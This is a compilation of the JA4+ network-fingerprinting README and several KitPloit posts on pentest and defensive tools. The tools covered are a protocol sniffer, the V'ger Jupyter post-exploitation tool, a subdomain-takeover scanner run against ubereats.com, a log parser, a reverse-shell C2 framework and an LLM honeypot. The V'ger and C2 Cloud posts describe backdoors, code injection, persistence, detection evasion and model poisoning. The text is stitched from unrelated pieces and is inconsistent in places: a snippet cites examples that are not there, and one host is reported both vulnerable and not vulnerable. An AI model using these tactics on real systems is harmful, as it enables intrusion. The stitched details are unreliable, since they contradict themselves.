JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
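A toy Python illustration of that a_b_c locality, using the Chrome fingerprint from the examples above:

def ja4_ac(fp):
    # Split a JA4 fingerprint into its a, b, c sections, then join a+c
    # (dropping b), as in the GreyNoise tracking example above.
    a, b, c = fp.split("_")
    return f"{a}_{c}"

print(ja4_ac("t13d1516h2_8daaf6152771_02713d6af862"))  # -> t13d1516h2_02713d6af862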

Current methods and implementation details:

| Full Name | Short Name | Description |
|---|---|---|
| JA4 | JA4 | TLS Client Fingerprinting |
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
| JA4HTTP | JA4H | HTTP Client Fingerprinting |
| JA4Latency | JA4L | Latency Measurement / Light Distance |
| JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
| JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
| JA4TCP | JA4T | TCP Client Fingerprinting |
| JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
| JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can and is being implemented into open source tools, see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions, and even though TLS 1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



KitPloit - PenTest Tools!

Above - Invisible Network Protocol Sniffer

By: Zion3R β€” May 22nd 2024 at 12:30


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It is invisible, and completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, who will know what to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + C

WARNING! Above is not designed to work with tunnel (L3) interfaces due to its use of filters for L2 protocols, so it may not work properly on tunneled L3 interfaces.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
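Conceptually, this passive ARP discovery boils down to the following Scapy sketch (a simplified illustration, not Above's actual code; requires root):

from scapy.all import ARP, sniff

def on_packet(pkt):
    # op == 2 is an ARP "is-at" reply; we only listen, never transmit.
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:
        print("[+] Detected ARP Reply")
        print(f"[*] ARP Reply for IP: {pkt[ARP].psrc}")
        print(f"[*] MAC Address: {pkt[ARP].hwsrc}")

# Mirrors --interface eth0 --passive-arp --timer 10
sniff(iface="eth0", filter="arp", prn=on_packet, store=False, timeout=10)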

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




KitPloit - PenTest Tools!

Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

By: Zion3R β€” May 21st 2024 at 12:30

V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

User Stories

  • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
  • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
  • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
  • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

Usage

Initial Setup

  1. pip install vger
  2. vger --help

Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

Commands

Once a connection is established, users drop into a nested set of menus.

The top level menu is:

  β€’ Reset: Configure a different host.
  β€’ Enumerate: Utilities to learn more about the host.
  β€’ Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
  β€’ Persist: Utilities to establish persistence mechanisms.
  β€’ Export: Save output to a text file.
  β€’ Quit: No one likes quitters.

These menus contain the following functionality:

  β€’ List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
  β€’ Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
  β€’ Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
  β€’ Check History: See ipython commands recently run in the target notebook.
  β€’ Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
  β€’ List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
  β€’ Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
  β€’ Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
  β€’ Find models: Find models based on common file formats.
  β€’ Download models: Download discovered models.
  β€’ Snoop: Monitor notebook execution and results until timeout.
  β€’ Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
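For context, the kind of authenticated Jupyter REST call a tool like this builds on looks roughly like the sketch below (not V'ger's code; the host and token are placeholders):

import json
import urllib.request

HOST = "http://target:8888"   # hypothetical Jupyter instance
TOKEN = "found-credential"    # hypothetical token

# List active notebook sessions via Jupyter's REST API.
req = urllib.request.Request(
    f"{HOST}/api/sessions",
    headers={"Authorization": f"token {TOKEN}"},
)
with urllib.request.urlopen(req, timeout=10) as resp:
    for session in json.load(resp):
        print(session["path"], session["kernel"]["id"])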

Experimental

With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant as a rough translation for non-DS/AI folks, for quick triage of whether (or which) notebooks are worth investigating further.

There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").


KitPloit - PenTest Tools!

Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R β€” May 15th 2024 at 12:30


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It typically happens when the subdomain has a CNAME record in the DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
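A minimal Python sketch of that check (Subhunter itself is written in Go; the fingerprints shown are illustrative stand-ins for the can-i-take-over-xyz data):

import urllib.request
import dns.resolver  # pip install dnspython

# Hypothetical fingerprints: CNAME substring -> "unclaimed resource" body marker.
FINGERPRINTS = {
    "s3.amazonaws.com": "NoSuchBucket",
    "github.io": "There isn't a GitHub Pages site here",
}

def possibly_vulnerable(subdomain):
    try:
        cname = str(dns.resolver.resolve(subdomain, "CNAME")[0].target)
    except Exception:
        return False  # no CNAME record, nothing to take over this way
    for service, marker in FINGERPRINTS.items():
        if service in cname:
            try:
                body = urllib.request.urlopen(f"http://{subdomain}", timeout=20).read()
            except Exception:
                return False
            return marker.encode() in body
    return False

print(possibly_vulnerable("test.example.com"))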


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




KitPloit - PenTest Tools!

MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

By: Zion3R β€” May 3rd 2024 at 12:30


What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the /var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log, extracting critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.
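As an illustration of the kind of extraction described above (MasterParser itself is a PowerShell script), this Python snippet pulls accepted SSH logins out of an auth.log:

import re

# Matches standard sshd lines like:
# "Accepted password for root from 203.0.113.5 port 52311 ssh2"
PATTERN = re.compile(
    r"Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>\S+) port (?P<port>\d+)"
)

with open("auth.log") as log:
    for line in log:
        m = PATTERN.search(line)
        if m:
            print(f"SSH login: {m['user']} from {m['ip']} ({m['method']})")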


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis.

| Supported Log Formats List |
| --- |
| auth.log |

Feature & Log Format Requests:

If you wish to propose the addition of a new feature / log format, kindly submit your request by creating an issue: Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press "<> Code" and then press "Download ZIP".
  2. From "MasterParser-main.zip" extract the folder "MasterParser-main" to your Desktop.
  3. Open a PowerShell terminal and navigate to the "MasterParser-main" folder.
# How to navigate to the "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  4. Now you can execute the tool. For example, to see the tool's command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  5. To run the tool, put all your /var/log/* logs into the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  6. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


KitPloit - PenTest Tools!

C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R β€” May 2nd 2024 at 12:30


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

πŸ”’ Anywhere Access: Reach the C2 Cloud from any location.
πŸ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
πŸ–±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
πŸ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

πŸ› οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
πŸ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
πŸ“¨ Redis PubSub: Serving as a robust message broker for seamless communication.
πŸš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πŸ’Ύ Postgres DB: Ensuring persistent storage for seamless continuity.
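As a toy illustration of the Pub/Sub role in this stack (the channel name and payload are assumptions, not C2 Cloud's actual schema):

import redis  # pip install redis

r = redis.Redis(host="localhost", port=6379)

# The websocket layer subscribes to a session channel...
pubsub = r.pubsub()
pubsub.subscribe("session:1234")

# ...and the backend publishes a command result to the same channel,
# which is then pushed to the browser in real time.
r.publish("session:1234", "command output here")

for message in pubsub.listen():
    if message["type"] == "message":
        print(message["data"].decode())
        break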

Architecture

Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.




KitPloit - PenTest Tools!

Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R β€” April 29th 2024 at 12:30


TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
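A toy sketch of that per-port cache behavior (Galah itself is written in Go; the names here are illustrative):

import time

CACHE_DURATION = 3600  # seconds; the real duration is set in the config file
_cache = {}

def cached_response(port, request_key, generate):
    # The port is part of the cache key, so an identical request hitting a
    # different port triggers a fresh LLM generation instead of a cache hit.
    key = (port, request_key)
    now = time.time()
    if key in _cache and now - _cache[key][0] < CACHE_DURATION:
        return _cache[key][1]
    response = generate()
    _cache[key] = (now, response)
    return response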

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

[ASCII art banner: GALAH]
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

